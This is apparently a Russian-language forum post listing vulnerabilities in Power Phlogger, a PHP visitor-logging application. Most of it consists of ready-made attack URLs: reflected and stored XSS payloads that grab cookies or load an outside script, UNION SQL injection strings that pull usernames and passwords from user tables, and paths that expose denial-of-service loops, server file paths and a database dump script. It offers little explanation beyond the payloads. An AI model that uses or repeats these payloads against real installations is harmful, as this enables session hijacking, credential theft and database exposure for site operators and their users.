Power Phlogger <= 2.0.9 (config.inc.php3) File Include Vulnerability
Power Phlogger Rel_Path Remote File Include Vulnerability
Power Phlogger Login.PHP SQL Injection Vulnerability
Power Phlogger 'css_str' SQL Injection Vulnerability
Power Phlogger 2.0.9 Remote|Local File Include Vulnerability
Power Phlogger v.2.2.5 (username) SQL Injection
XSS:
Код:
http://site/dspLogs.php?S_hostname=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://site/dspLogs.php?S_referer=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://site/dspLogs.php?S_agent=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://site/dspLogs.php?S_res=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://site/edCss.php?css_str=12%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&action=edit
Код:
http://site/dspLogs.php?S_color=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://site/dspLogs.php?S_online=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://site/dspLogs.php?S_mp=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://site/dspStats.php?edit=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://site/dspLogs.php/%22%3E%3Cscript%20src=XSS
Код:
http://site/dspStats.php/%22%3E%3Cscript%20src=XSS
Код:
http://site/edCss.php/%22%3E%3Cscript%20src=XSS
Код:
http://site/edCss.php?action=create+new&fields%5Bcss%5D=%3Cscript%3Ealert(document.cookie)%3C/script%3E
XSS (Persistent):
Post запрос на странице
http://site/edUserprofile.php
Код:
</textarea><script>alert(document.cookie)</script>
В параметре N_your_url
Код:
"><script>alert(document.cookie)</script>
В параметре N_email
Код:
"><script src=http://site.com
В параметрах N_fg_c, N_bg_c(до 30 символов)
DoS:
http://site/include/get_userdata.php
http://site/newaccount_self.php
Зацикленные редиректы.
(c)MustLive
SQL иньекции:
Код:
http://site/edCss.php?css_str=-1%20union%20select%20null,null,id,username,pw,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20pphl_users%20limit%200,1&action=edit
Код:
http://site/edit.php?site=-12%20union%20select%200,1,username,password,4,version(),user(),7,8,9,10,11,database(),13,14,15,16,17,18++from+users--
Full path disclosure:
http://site/include/edCss.inc.php
http://site/include/foot.inc.php
http://site/include/get_csscolors.inc.php
http://site/include/head.inc.php
http://site/include/head_stuff.inc.php
http://site/include/loglist.inc.php
http://site/include/pphlogger_send.inc.php
http://site/modules/usercreate.php
http://site/modules/htmlMimeMail.php
http://site/modules/img_vis_per_hour.mod.php
http://site/modules/usercreate.php
http://site/modules/htmlMimeMail.php
http://site/modules/img_vis_per_hour.mod.php
http://site/edit_user.php
http://site/main-dummy.php
http://site/main.php
http://site/modules/htmlMimeMail.php
http://site/modules/img_vis_per_hour.mod.php
http://site/modules/usercreate.php
Information disclosure:
http://site/modules/db_dump.php
Названия базы данных,струкрура таблиц
http://site/robots.txt
http://site/upgrade/extchange.php
http://site/main_location.inc
Код:
<meta name="PHP Version" content="..." />
<meta name="MYSQL Version" content="..." />
[Обзор уязвимостей Power Phlogger]
Похожие темы
Линейный вид
